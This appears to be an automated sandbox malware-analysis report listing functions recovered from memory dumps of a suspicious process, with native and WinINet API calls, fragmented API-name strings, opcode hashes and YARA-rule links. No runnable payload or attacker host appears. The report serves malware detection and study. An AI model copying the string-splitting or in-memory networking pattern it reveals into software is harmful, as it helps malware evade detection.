API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6c51aa104ddf03597c0a3cf0a55266f925ee488c0663fbc61539a63449f21648
Instruction ID: 737f2161030d44f1ced71db0e4810ced3ff4679648132f1c6cde0b89497e335a
Opcode Fuzzy Hash: 6c51aa104ddf03597c0a3cf0a55266f925ee488c0663fbc61539a63449f21648
Instruction Fuzzy Hash: 74F0A4B6200109ABCB14DF8DDC81EEB77A9EF8C754F158648FA1D97241DA30E951CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02898270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02893D52,5E972F59,FFFFFFFF,02893A11,?,?,02893D52,?,02893A11,FFFFFFFF,5E972F59,02893D52,?,00000000), ref: 028982B5

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: abbe85524259bea7259f4fe496ae495258fc60b2056d2b9fae7f2dd45fa06c40
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 3DF0A4B6200208ABCB14DF8DDC80EEB77ADAF8C754F158648BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0289839C, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02882D11,00002000,00003000,00000004), ref: 028983D9

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 7d85ad0d8fbdcb98b58fc6c0a435e37cb68333adfb6f06ba1ccb4a55ca4f3cce
Instruction ID: d17ec7e79f0aa2e2c4656f9bb10c2269155c4a54048c4dbd44e49f760500aa3c
Opcode Fuzzy Hash: 7d85ad0d8fbdcb98b58fc6c0a435e37cb68333adfb6f06ba1ccb4a55ca4f3cce
Instruction Fuzzy Hash: 6AF015B6200208ABDB14DF88CC80EAB77ADAF88750F158548FE1897241C630E911CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 028983A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02882D11,00002000,00003000,00000004), ref: 028983D9

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: ca985752e37b3bca9fd1985364305dd45218554b450dd38e018fedda9925db42
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: B7F015B6200208ABCB14DF89CC80EAB77ADAF88750F158548FE0897241C630F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 028982F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02893D30,?,?,02893D30,00000000,FFFFFFFF), ref: 02898315

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 1ae6baad36849f472199ce6e1727d38b7e79abe6eae99d78e8e6a415a237492c
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 40D012752002146BD710EF98CC45E97775DEF44750F154455BA189B241C530F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 028982EA, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02893D30,?,?,02893D30,00000000,FFFFFFFF), ref: 02898315

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: c9489370fd7baf6818cc4f9aca4843e7f98fe9f2d19ec08cba65dc9db2bd9de3
Instruction ID: 236260538a6f98fc82ef8e200a7e3451b6980809adf72e5372d74a911f69a3b7
Opcode Fuzzy Hash: c9489370fd7baf6818cc4f9aca4843e7f98fe9f2d19ec08cba65dc9db2bd9de3
Instruction Fuzzy Hash: 95E0C2B980D2C44FCB11FF78A8C4086BF40DE52224B194ACED4A447503C525A2559792

Uniqueness

Uniqueness Score: -1.00%

Function 03659710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365971A

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 464804e93a3304c81a1227d9d99b9a429cbdc8f6a69f95877bff9d09c8941fc0
Instruction ID: 3f2f2ee0648f63cbaab480a7b48f063e0df949512af66244b99476d0c903edcc
Opcode Fuzzy Hash: 464804e93a3304c81a1227d9d99b9a429cbdc8f6a69f95877bff9d09c8941fc0
Instruction Fuzzy Hash: 6C90027130108C02D100A99A5409646000997E1381F51D011A5014555ECBA588917171

Uniqueness

Uniqueness Score: -1.00%

Function 03659FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03659FEA

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1dfe6c55456177d5cbdffafcbbe65242693a4ff8270aefe2e20ba6d64e9c8316
Instruction ID: 96a8a1e4a52aa3ef0db2c1e6f4c6a6ebee6cbceb1e3e8b9c40ae72d4602d0be5
Opcode Fuzzy Hash: 1dfe6c55456177d5cbdffafcbbe65242693a4ff8270aefe2e20ba6d64e9c8316
Instruction Fuzzy Hash: 829002713111CC02D110A55A8405706000997D2281F51C411A0814558D8BD588917162

Uniqueness

Uniqueness Score: -1.00%

Function 03659780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365978A

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3663e0fe1a49dc32b38d94fc7e95dcb15459ebae08c25eba916367fe27899efe
Instruction ID: dfa5b58c2a178220373801ca877ec5e6c626938865a1075074718cda601c2deb
Opcode Fuzzy Hash: 3663e0fe1a49dc32b38d94fc7e95dcb15459ebae08c25eba916367fe27899efe
Instruction Fuzzy Hash: A990026931308802D180B55A540960A000997D2282F91D415A0005558CCE5588696361

Uniqueness

Uniqueness Score: -1.00%

Function 03659660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365966A

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e5a789a1bb428086382e1dd069118b83e8c2d0b59f99650074aea7c9febf51b7
Instruction ID: 45593fae3bd1cdde5a1b9b9868a3efc13c02ad0c87fa9f7da39c9deb09b0574c
Opcode Fuzzy Hash: e5a789a1bb428086382e1dd069118b83e8c2d0b59f99650074aea7c9febf51b7
Instruction Fuzzy Hash: 5190027130108C02D180B55A440564A000997D2381F91C015A0015654DCF558A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 03659650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365965A

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3268b36867ebadf4bcae00d84deee6fded80c4fb56a2a1e2f425fd8b2dc4dd97
Instruction ID: d1f6f5d14eeeb5e22db5d69ca793291bd28d03c24dfcf525398b2e6fbec75e6a
Opcode Fuzzy Hash: 3268b36867ebadf4bcae00d84deee6fded80c4fb56a2a1e2f425fd8b2dc4dd97
Instruction Fuzzy Hash: 2C9002713050CC42D140B55A4405A46001997D1385F51C011A0054694D9B658D55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 03659A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03659A5A

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24492cf1e33eeb6a2ce4724947596f78eb82f8c516e1973556d22a27c11e229e
Instruction ID: 449afc2be4d0bf223d542e6bb3ebca36e588d850c45a342b15a924302fa2b75b
Opcode Fuzzy Hash: 24492cf1e33eeb6a2ce4724947596f78eb82f8c516e1973556d22a27c11e229e
Instruction Fuzzy Hash: 3390026131188842D200A96A4C15B07000997D1383F51C115A0144554CCE5588616561

Uniqueness

Uniqueness Score: -1.00%

Function 036596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036596EA

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f0b90565497c49e2d323b8eb4268a83d79c4307669a849a9643d16aee7c725a4
Instruction ID: 23b4cc472d87029fe12b98816050c7f00d23cb17d961ff7aa4107c869006a4d7
Opcode Fuzzy Hash: f0b90565497c49e2d323b8eb4268a83d79c4307669a849a9643d16aee7c725a4
Instruction Fuzzy Hash: E59002713010CC02D110A55A840574A000997D1381F55C411A4414658D8BD588917161

Uniqueness

Uniqueness Score: -1.00%

Function 036596D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036596DA

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f37c435001eef0c2b7a29fd0e6b2589acb9ae444b1a18c64df6002fe192f261d
Instruction ID: 52358c9f3777fdd3e3ba835bbaf7204765f10c21ee56f532e89d75ab9cd64727
Opcode Fuzzy Hash: f37c435001eef0c2b7a29fd0e6b2589acb9ae444b1a18c64df6002fe192f261d
Instruction Fuzzy Hash: CD90027130108C42D100A55A4405B46000997E1381F51C016A0114654D8B55C8517561

Uniqueness

Uniqueness Score: -1.00%

Function 03659540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365954A

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c529a223b0c3eadc14c7dad97ee61989c42c5adcfa9a82f193e01806e032009d
Instruction ID: 7035bda8bc9f0479ac03f9f4504b1445dfe3636c7d72c5b9aae12e5d603771b7
Opcode Fuzzy Hash: c529a223b0c3eadc14c7dad97ee61989c42c5adcfa9a82f193e01806e032009d
Instruction Fuzzy Hash: E9900265311088030105E95A0705507004A97D63D1351C021F1005550CDB6188616161

Uniqueness

Uniqueness Score: -1.00%

Function 03659910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365991A

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9421de46dfe394fd3b368ebf49d0464bbb844c50061e55106d9fec2a4b0af960
Instruction ID: 4d44fdc2c87e1a37e183f82f2ea82423d057b21f311c3e8b9b98c15630799366
Opcode Fuzzy Hash: 9421de46dfe394fd3b368ebf49d0464bbb844c50061e55106d9fec2a4b0af960
Instruction Fuzzy Hash: 4C9002B130108C02D140B55A4405746000997D1381F51C011A5054554E8B998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 036595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036595DA

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: acc0f1f7c1f716eb36280d7cce708809a28de9108ac70e255d4fcd7e8389efb8
Instruction ID: c17548ba67cecfbf5b1b1150bc732936144d46bd64d20269ad316d9b302a6338
Opcode Fuzzy Hash: acc0f1f7c1f716eb36280d7cce708809a28de9108ac70e255d4fcd7e8389efb8
Instruction Fuzzy Hash: AF9002A1302088034105B55A4415616400E97E1281B51C021E1004590DCA6588917165

Uniqueness

Uniqueness Score: -1.00%

Function 036599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036599AA

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f0cb15e3b09fd5c3f672618d132b0c4db8c2e765fdf24008c5c746b32230bba
Instruction ID: 49a4549093d38c930c01273bc5845e440c16a38e54e7e53ecab57cef99568b3c
Opcode Fuzzy Hash: 7f0cb15e3b09fd5c3f672618d132b0c4db8c2e765fdf24008c5c746b32230bba
Instruction Fuzzy Hash: A19002A134108C42D100A55A4415B060009D7E2381F51C015E1054554D8B59CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 03659860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365986A

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d2603a7faaf3e8ad74d8042e48a53bc1dd3cf5833df1532f97581a35dc15250c
Instruction ID: 64053f38f4e54cd455b5a096e471f76027a2e6ec059380bb6c31b8b43d72ee39
Opcode Fuzzy Hash: d2603a7faaf3e8ad74d8042e48a53bc1dd3cf5833df1532f97581a35dc15250c
Instruction Fuzzy Hash: 2690027130108C13D111A55A4505707000D97D12C1F91C412A0414558D9B968952B161

Uniqueness

Uniqueness Score: -1.00%

Function 03659840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0365984A

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a90066fa04f5034b0143b4b7ff8d87ce2669bf0e7feee0ceec0d7d2db6a90d31
Instruction ID: d55dfcf6ef61a83b73698f0d2d35c9456123ffaa6455ac0a95f78a9dc0710121
Opcode Fuzzy Hash: a90066fa04f5034b0143b4b7ff8d87ce2669bf0e7feee0ceec0d7d2db6a90d31
Instruction Fuzzy Hash: E69002613420C9525545F55A4405507400AA7E12C1791C012A1404950C8A669856E661

Uniqueness

Uniqueness Score: -1.00%

Function 028988D0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 02898938

Strings

Http, xrefs: 028988EA
Requ, xrefs: 028988F8
RequestA, xrefs: 02898932, 02898937
estA, xrefs: 028988FF
OpenRequestA, xrefs: 0289892E, 02898936
HttpOpenRequestA, xrefs: 0289892A, 02898935
HttpOpenRequestA, xrefs: 028988DD, 028988E0
Open, xrefs: 028988F1

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction ID: e89661b1056d54a7d0b1e91fda5dca2ca8dc5deb295b33ae210deea833261b83
Opcode Fuzzy Hash: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction Fuzzy Hash: 1301E5B6A05119AFCB04DF98D841DEF7BBDEB49210F158289FD48A7204D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 028988C6, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 45networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 02898938

Strings

Http, xrefs: 028988EA
Requ, xrefs: 028988F8
RequestA, xrefs: 02898932, 02898937
estA, xrefs: 028988FF
OpenRequestA, xrefs: 0289892E, 02898936
HttpOpenRequestA, xrefs: 0289892A, 02898935
HttpOpenRequestA, xrefs: 028988DD, 028988E0
Open, xrefs: 028988F1

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: b3885edd8b70850d85a7b3e547bdde837713a675387506174147c9aceac1d5d9
Instruction ID: c0d60342266c277330f73b714de36f6e0bc962860a035c5a284b9f60e92fce1b
Opcode Fuzzy Hash: b3885edd8b70850d85a7b3e547bdde837713a675387506174147c9aceac1d5d9
Instruction Fuzzy Hash: EC01E5B6904119AFCB04DF89C845DEF7BB9AF49610F158288BD48AB304D730EE108BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02898850, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 028988B8

Strings

InternetConnectA, xrefs: 028988AA, 028988B5
ectA, xrefs: 0289887F
rnetConnectA, xrefs: 028988AE, 028988B6
Inte, xrefs: 0289886A
ConnectA, xrefs: 028988B2, 028988B7
Conn, xrefs: 02898878
rnet, xrefs: 02898871

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction ID: c93ab9d779bf09260ab06b8efe135e795c5faa3c3dec341799f95d2c3dd484d3
Opcode Fuzzy Hash: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction Fuzzy Hash: C001E9B6905119AFCB14DF99D941EEF77B9EB48310F154289BE08A7240D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0289884E, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 44networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 028988B8

Strings

InternetConnectA, xrefs: 028988AA, 028988B5
ectA, xrefs: 0289887F
rnetConnectA, xrefs: 028988AE, 028988B6
Inte, xrefs: 0289886A
ConnectA, xrefs: 028988B2, 028988B7
Conn, xrefs: 02898878
rnet, xrefs: 02898871

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 9b54199d35880bde34c60fdb34e54638df0c9c813b96c30afaea5ee54ca3f9e7
Instruction ID: 130617858ba382b4b5fe5188263defd2afa0855aa7c900ebdf90e3c1d8b39c24
Opcode Fuzzy Hash: 9b54199d35880bde34c60fdb34e54638df0c9c813b96c30afaea5ee54ca3f9e7
Instruction Fuzzy Hash: 03012CB6909159AFCB04CF89D940AEF7BB9FB49350F158288FA18A7201C6309E018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 028987E0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02898837

Strings

Inte, xrefs: 028987FA
rnetOpenA, xrefs: 02898831, 02898836
InternetOpenA, xrefs: 0289882D, 02898835
Open, xrefs: 02898808
A, xrefs: 0289880F
rnet, xrefs: 02898801

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction ID: b97d4dcd61164fea5471d90799848be2c4c0d3ec55975b5d778e010349c48751
Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction Fuzzy Hash: 60F019B6901119AF8B14DF98DC419FBB7BDEF48310B048589BE18A7301D634AE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02896EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02896F88

Strings

net.dll, xrefs: 02896F51, 02896FD7, 02896FAF, 02896FBB, 02896FE3
wininet.dll, xrefs: 02896F3E, 02896F47

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
Instruction ID: 45aeb84a44724db0a132dbc64d77e21b5bf4de642236211e233199f4bcec61e3
Opcode Fuzzy Hash: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
Instruction Fuzzy Hash: 9E3190B9601704ABDB25DF68CCA0FABB7B8BB48704F04841DF61A9B641E770A445CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02896EDC, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02896F88

Strings

net.dll, xrefs: 02896F51, 02896FAF, 02896FBB
wininet.dll, xrefs: 02896F3E, 02896F47

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: acd3cbe6b8238f389dd20aee0d16ef74c11895af744db4ca8f499df23cfb0559
Instruction ID: c81c35b747b60262a435c31f420d1510529f9de303aa61202180bd98f1d49650
Opcode Fuzzy Hash: acd3cbe6b8238f389dd20aee0d16ef74c11895af744db4ca8f499df23cfb0559
Instruction Fuzzy Hash: B72191B9601704ABDB10DF68CCA1FABB7B9BB48704F04806DF61E9B641E774A445CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02897003, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0288CCD0,?,?), ref: 0289704C

Strings

net.dll, xrefs: 02896FE3

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID: net.dll
API String ID: 2422867632-2431746569
Opcode ID: a1d3f47a508e48a06f3728f7dfa44fc1b56a0764849325828dc2dea4a1977c34
Instruction ID: 80c234542f51e30e407ba192313bca424cf118cca2f55303eaaaf6a06e75dc78
Opcode Fuzzy Hash: a1d3f47a508e48a06f3728f7dfa44fc1b56a0764849325828dc2dea4a1977c34
Instruction Fuzzy Hash: DE11267E2493902AD731677C9C41FA7BB98CF82B10F0801DEF549DF682D6A16405CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 028984D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02883B93), ref: 028984FD

Strings

.z`, xrefs: 028984EC, 028984F8

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 920aed65d501c93393ce30410221b485510c7bf541dc9d3a7722dc8416cf9b94
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: C2E046B5200208ABDB18EF99CC48EA777ADEF88750F018558FE089B241CA30F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02887260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 028872DB

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
